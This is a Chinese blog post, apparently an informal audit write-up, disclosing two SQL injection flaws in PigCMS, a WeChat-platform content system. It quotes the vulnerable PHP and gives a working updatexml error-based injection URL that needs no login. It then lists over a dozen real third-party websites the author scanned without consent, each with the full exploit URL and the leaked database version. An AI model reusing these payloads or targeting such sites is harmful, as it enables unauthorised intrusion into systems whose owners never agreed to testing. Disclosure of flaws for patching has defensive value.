pigcms某版本注入两枚

最近在搞微信公众平台.某朋友推荐了PIGCMS.初始的时候感觉确实挺好。本着屌丝渣渣审计的基础。尝试审计,基础的注入两枚.
1.\PigCms\Lib\Action\User\ImgBaseAction.class.php

	public function index(){
		$db=D('Img');
		$token = session('token');
		if(IS_POST && $_POST['search'] != ''){ //没有经过任何处理
			$search = trim($this->_post('search'));
			$where = "token = '$token' AND title like '%$search%'";//直接查询
		}else{
			$where['token']=$token;
		}
		$count=$db->where($where)->count();
		$page=new Page($count,20);
		$info=$db->where($where)->order('usort DESC')->limit($page->firstRow.','.$page->listRows)->select();
		$this->assign('page',$page->show());
		$this->assign('info',$info);
	}

获取到的search没有经过任何处理。直接带入了数据库。造成了注入的产生.在文件PigCms\Lib\Action\User\ImgAction.class.php里面

<?php
class ImgAction extends ImgBaseAction{
	public function _initialize() {
		parent::_initialize();
	}
	public function index(){
		parent::index();//加载了index函数
		$this->display();

	}

由于token是系统产生的,所以必须要登录后才可以获取到.能控制的地方只有search了
11搜索的地方直接写入SQL注入语句
11
2.再来一个无需登录的注入
PigCms\Lib\Action\Wap\DiningAction.class.php

	function showDetail(){
	 	$id = $_GET['id'];
	 	$info = $this->product_model->where('id='.$id)->find();
		
		echo('
		<h3 id="foodname">'.$info['name'].'</h3>
		<img class="foodimage" src="'.$info['logourl'].'">
		<p><span class="attr-title">价格:</span>'.$info['price'].'</p>
		<p><span class="attr-title">描述:</span>'.$this->replaceHtmlAndJs($info['intro']).'</p>');
	}

直接带入数据库里面查询去了.对应的SQL语句

SELECT * FROM `tp_product` WHERE id=$id LIMIT 1

index.php?g=Wap&m=Dining&a=ShowDetail&id=2%20and%20updatexml(1,concat(0x7e,(version())),0)%23
11
随意抓了一些来扫

http://www.aqwy.com.cn/index.php?g=Wap&m=Dining&a=ShowDetail&id=2%20and%20updatexml(1,concat(0x7e,(version())),0)%23:数据库版本5.6.2-m5-log
http://www.weixint.com/index.php?g=Wap&m=Dining&a=ShowDetail&id=2%20and%20updatexml(1,concat(0x7e,(version())),0)%23:数据库版本5.5.40
http://www.chinabtob.net/index.php?g=Wap&m=Dining&a=ShowDetail&id=2%20and%20updatexml(1,concat(0x7e,(version())),0)%23:数据库版本5.5.40
http://www.010gz.com/index.php?g=Wap&m=Dining&a=ShowDetail&id=2%20and%20updatexml(1,concat(0x7e,(version())),0)%23:数据库版本5.1.73-community
http://58zcm.com/index.php?g=Wap&m=Dining&a=ShowDetail&id=2%20and%20updatexml(1,concat(0x7e,(version())),0)%23:数据库版本5.5.18.1-log
http://www.lyjhweixin.com/index.php?g=Wap&m=Dining&a=ShowDetail&id=2%20and%20updatexml(1,concat(0x7e,(version())),0)%23:数据库版本5.5.40
http://v.lincang123.com/index.php?g=Wap&m=Dining&a=ShowDetail&id=2%20and%20updatexml(1,concat(0x7e,(version())),0)%23:数据库版本5.1.65-community
http://www.lyjhweixin.com/index.php?g=Wap&m=Dining&a=ShowDetail&id=2%20and%20updatexml(1,concat(0x7e,(version())),0)%23:数据库版本5.5.40
http://pingtai.weixinla.com/index.php?g=Wap&m=Dining&a=ShowDetail&id=2%20and%20updatexml(1,concat(0x7e,(version())),0)%23:数据库版本5.6.12-log
http://www.weisuyun.com/index.php?g=Wap&m=Dining&a=ShowDetail&id=2%20and%20updatexml(1,concat(0x7e,(version())),0)%23:数据库版本5.5.24-CDB-2.0.0-log
http://www.vshark.cn/index.php?g=Wap&m=Dining&a=ShowDetail&id=2%20and%20updatexml(1,concat(0x7e,(version())),0)%23:数据库版本5.5.40-log
http://www.tangzhongren.com/index.php?g=Wap&m=Dining&a=ShowDetail&id=2%20and%20updatexml(1,concat(0x7e,(version())),0)%23:数据库版本5.5.40
http://wechat.cqbaidu.com/index.php?g=Wap&m=Dining&a=ShowDetail&id=2%20and%20updatexml(1,concat(0x7e,(version())),0)%23:数据库版本5.5.40

发表评论